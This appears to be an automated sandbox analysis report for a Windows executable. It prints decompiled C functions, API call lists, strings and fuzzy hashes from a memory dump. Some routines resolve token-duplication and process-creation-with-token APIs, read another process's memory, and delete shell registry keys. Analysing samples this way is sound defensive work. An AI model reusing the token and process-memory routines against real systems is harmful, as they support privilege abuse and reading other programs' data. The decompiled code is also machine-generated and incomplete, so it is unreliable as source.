                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                				char* _v16;
                                                                                                                				int _v18;
                                                                                                                				signed int _v20;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr* _t21;
                                                                                                                				struct HINSTANCE__* _t22;
                                                                                                                				signed int _t23;
                                                                                                                				signed int _t24;
                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                				char* _t28;
                                                                                                                				int _t31;
                                                                                                                
                                                                                                                				_t21 = _a4;
                                                                                                                				if( *_t21 == 0) {
                                                                                                                					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					_v8 = _t22;
                                                                                                                					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                                					 *_a4 = _t23;
                                                                                                                					_t24 = _t23 ^ _v8;
                                                                                                                					if((_t24 & 0xfff00000) != 0) {
                                                                                                                						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                                						_v20 = _v20 & 0x00000000;
                                                                                                                						_v12 = _t26;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosw");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsw");
                                                                                                                						_t28 =  &_v36;
                                                                                                                						asm("movsb");
                                                                                                                						_v16 = _t28;
                                                                                                                						_v20 = strlen(_t28);
                                                                                                                						_t31 = strlen( &_v36);
                                                                                                                						_v18 = _t31;
                                                                                                                						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                                					}
                                                                                                                					return _t24;
                                                                                                                				}
                                                                                                                				return _t21;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
                                                                                                                				void* _t9;
                                                                                                                				struct HINSTANCE__* _t10;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *(__esi + 0x10) == 0) {
                                                                                                                					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                                					 *(__esi + 0x10) = _t10;
                                                                                                                					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                                					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                                					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                                					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                                					 *(__esi + 8) = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                • API String ID: 2238633743-1970996977
                                                                                                                • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                                				long _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				int _v20;
                                                                                                                				int _v24;
                                                                                                                				char _v28;
                                                                                                                				void _v538;
                                                                                                                				char _v540;
                                                                                                                				int _v548;
                                                                                                                				char _v564;
                                                                                                                				char _v22292;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t37;
                                                                                                                				void* _t48;
                                                                                                                				void* _t56;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t67;
                                                                                                                				long _t69;
                                                                                                                				void* _t70;
                                                                                                                				void* _t72;
                                                                                                                				void* _t74;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t67 = __edx;
                                                                                                                				E0040B550(0x5714, __ecx);
                                                                                                                				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                                				_t82 = _t37;
                                                                                                                				_a16 = _t37;
                                                                                                                				if(_t37 == 0) {
                                                                                                                					_t69 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t72 =  &_v22292;
                                                                                                                					E0040171F(_t72, _t82);
                                                                                                                					_v8 = 0;
                                                                                                                					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
                                                                                                                						_t69 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_t48 = E00405642( &_v564);
                                                                                                                						_t74 = _v548;
                                                                                                                						_t70 = _t48;
                                                                                                                						_a12 = _t74;
                                                                                                                						_v540 = 0;
                                                                                                                						memset( &_v538, 0, 0x1fe);
                                                                                                                						asm("cdq");
                                                                                                                						_push(_t67);
                                                                                                                						_push(_t74);
                                                                                                                						_push(_t70);
                                                                                                                						_push(L"%d  %I64x");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v540);
                                                                                                                						L0040B1EC();
                                                                                                                						_v548 = 0;
                                                                                                                						E004055D1( &_v540,  &_v564);
                                                                                                                						_t16 = _t70 + 0xa; // 0xa
                                                                                                                						_t68 = _t16;
                                                                                                                						_v24 = 0;
                                                                                                                						_v12 = 0;
                                                                                                                						_v20 = 0;
                                                                                                                						_v16 = 0x100;
                                                                                                                						_v28 = 0;
                                                                                                                						E0040559A( &_v28, _t16);
                                                                                                                						_t76 = _v12;
                                                                                                                						_t56 = 0x40c4e8;
                                                                                                                						if(_t76 != 0) {
                                                                                                                							_t56 = _t76;
                                                                                                                						}
                                                                                                                						_t26 = _t70 + 2; // 0x2
                                                                                                                						_t66 = _t70 + _t26;
                                                                                                                						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
                                                                                                                						_t85 = _t76;
                                                                                                                						if(_t76 == 0) {
                                                                                                                							_t76 = 0x40c4e8;
                                                                                                                						}
                                                                                                                						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                                						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
                                                                                                                						E004055D1(_t61,  &_v28);
                                                                                                                					}
                                                                                                                					E004055D1(CloseHandle(_a16),  &_v564);
                                                                                                                				}
                                                                                                                				return _t69;
                                                                                                                			}


























                                                                                                                0x00401b9b
                                                                                                                0x00401ba0
                                                                                                                0x00401ba5
                                                                                                                0x00401baa
                                                                                                                0x00401bac
                                                                                                                0x00401bac
                                                                                                                0x00401bb2
                                                                                                                0x00401bb2
                                                                                                                0x00401bbe
                                                                                                                0x00401bc4
                                                                                                                0x00401bc6
                                                                                                                0x00401bc8
                                                                                                                0x00401bc8
                                                                                                                0x00401bd7
                                                                                                                0x00401bee
                                                                                                                0x00401bf0
                                                                                                                0x00401bf0
                                                                                                                0x00401c0e
                                                                                                                0x00401c0e
                                                                                                                0x00401c23

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 2567117392-2565891505
                                                                                                                • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                				void* _v8;
                                                                                                                				void _v2054;
                                                                                                                				short _v2056;
                                                                                                                				void _v4102;
                                                                                                                				short _v4104;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				E0040B550(0x1004, __ecx);
                                                                                                                				_t36 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                                					_v2056 = 0;
                                                                                                                					memset( &_v2054, 0, 0x7fe);
                                                                                                                					_v4104 = 0;
                                                                                                                					memset( &_v4102, 0, 0x7fe);
                                                                                                                					_t34 = __ebx + 0x20a;
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s\\command");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2056);
                                                                                                                					L0040B1EC();
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v4104);
                                                                                                                					L0040B1EC();
                                                                                                                					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                                					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t36 =  ~_t28 + 1;
                                                                                                                					RegCloseKey(_v8);
                                                                                                                				}
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                • API String ID: 1018939227-3575174989
                                                                                                                • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				struct HWND__* _t6;
                                                                                                                				_Unknown_base(*)()* _t11;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t20;
                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                
                                                                                                                				_v12 = 8;
                                                                                                                				_v8 = 0xff;
                                                                                                                				_t15 = 0;
                                                                                                                				_t20 = 0;
                                                                                                                				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                				if(_t23 == 0) {
                                                                                                                					L5:
                                                                                                                					__imp__#17();
                                                                                                                					_t6 = 1;
                                                                                                                					L6:
                                                                                                                					if(_t6 != 0) {
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_t20 = 1;
                                                                                                                					_t15 =  *_t11( &_v12);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t23);
                                                                                                                				if(_t20 == 0) {
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t6 = _t15;
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                				struct HWND__* _v8;
                                                                                                                				struct HWND__* _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				int _t50;
                                                                                                                				long _t61;
                                                                                                                				struct HDC__* _t63;
                                                                                                                				intOrPtr _t65;
                                                                                                                				intOrPtr _t68;
                                                                                                                				struct HWND__* _t71;
                                                                                                                				intOrPtr _t72;
                                                                                                                				void* _t73;
                                                                                                                				int _t74;
                                                                                                                				int _t80;
                                                                                                                				int _t83;
                                                                                                                
                                                                                                                				_t73 = __edx;
                                                                                                                				_v8 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_t74 = GetSystemMetrics(0x11);
                                                                                                                				_t80 = GetSystemMetrics(0x10);
                                                                                                                				if(_t74 == 0 || _t80 == 0) {
                                                                                                                					_t63 = GetDC(0);
                                                                                                                					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                					ReleaseDC(0, _t63);
                                                                                                                				}
                                                                                                                				GetWindowRect(_a4,  &_v44);
                                                                                                                				if((_a8 & 0x00000004) != 0) {
                                                                                                                					_t71 = GetParent(_a4);
                                                                                                                					if(_t71 != 0) {
                                                                                                                						_v28.left = _v28.left & 0x00000000;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						GetWindowRect(_t71,  &_v28);
                                                                                                                						_t61 = _v28.left;
                                                                                                                						_t72 = _v28.top;
                                                                                                                						_t80 = _v28.right - _t61 + 1;
                                                                                                                						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                						_v8 = _t61;
                                                                                                                						_v12 = _t72;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t65 = _v44.right;
                                                                                                                				if((_a8 & 0x00000001) == 0) {
                                                                                                                					asm("cdq");
                                                                                                                					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                				} else {
                                                                                                                					_t83 = 0;
                                                                                                                				}
                                                                                                                				_t68 = _v44.bottom;
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					L11:
                                                                                                                					_t50 = 0;
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					asm("cdq");
                                                                                                                					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                					if(_t50 >= 0) {
                                                                                                                						L12:
                                                                                                                						if(_t83 < 0) {
                                                                                                                							_t83 = 0;
                                                                                                                						}
                                                                                                                						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                					}
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t3;
                                                                                                                				int _t6;
                                                                                                                
                                                                                                                				_t3 = E00404AAA(_a4);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					wcscpy(0x40fb90, _a4);
                                                                                                                					wcscpy(0x40fda0, L"general");
                                                                                                                					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                                					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                                					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                                					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                                				}
                                                                                                                				return _t3;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                                				void* _t2;
                                                                                                                				signed short* _t3;
                                                                                                                				void* _t7;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t3 = __eax;
                                                                                                                				_t8 = __ecx;
                                                                                                                				_t7 = 8;
                                                                                                                				while(1) {
                                                                                                                					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                					if(_t2 != 0x3c) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					_push(_t7);
                                                                                                                					_push(L"&lt;");
                                                                                                                					L14:
                                                                                                                					_t2 = memcpy(_t8, ??, ??);
                                                                                                                					_t10 = _t10 + 0xc;
                                                                                                                					_t8 = _t8 + _t7;
                                                                                                                					L16:
                                                                                                                					if( *_t3 != 0) {
                                                                                                                						_t3 =  &(_t3[1]);
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					return _t2;
                                                                                                                					L3:
                                                                                                                					if(_t2 != 0x3e) {
                                                                                                                						if(_t2 != 0x22) {
                                                                                                                							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                								if(_t2 != 0x26) {
                                                                                                                									if(_t2 != 0xa) {
                                                                                                                										 *_t8 = _t2;
                                                                                                                										_t8 = _t8 + 2;
                                                                                                                									} else {
                                                                                                                										_push(_t7);
                                                                                                                										_push(L"<br>");
                                                                                                                										goto L14;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_push(0xa);
                                                                                                                									_push(L"&amp;");
                                                                                                                									goto L11;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_push(0xa);
                                                                                                                								_push(L"&deg;");
                                                                                                                								L11:
                                                                                                                								_t2 = memcpy(_t8, ??, ??);
                                                                                                                								_t10 = _t10 + 0xc;
                                                                                                                								_t8 = _t8 + 0xa;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                							_t10 = _t10 + 0xc;
                                                                                                                							_t8 = _t8 + 0xc;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_push(_t7);
                                                                                                                						_push(L"&gt;");
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
